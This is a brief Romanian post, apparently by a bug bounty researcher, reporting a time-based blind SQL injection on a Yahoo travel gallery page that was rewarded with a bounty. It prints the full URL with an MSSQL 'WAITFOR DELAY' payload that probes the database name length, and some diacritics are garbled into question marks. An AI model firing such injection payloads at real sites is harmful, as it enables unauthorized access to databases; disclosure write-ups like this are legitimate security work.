Este vorba despre o vulnerabilitate SQL Injection care se putea exploata doar prin metoda Time Based. Exploatându-se doar prin Time Based, nu prea am ce PoC s? pun pentru c? n-am f?cut video. Aici a fost: https://au.totaltravel.yahoo.com/travel-ideas/galleries/g/-/24496066/1/natures-pools-in-paradise/?cmp=thomepage' if(LEN(DB_NAME())=5) WAITFOR DELAY '0:0:10'-- Am primit o recompens? destul de frumoasa: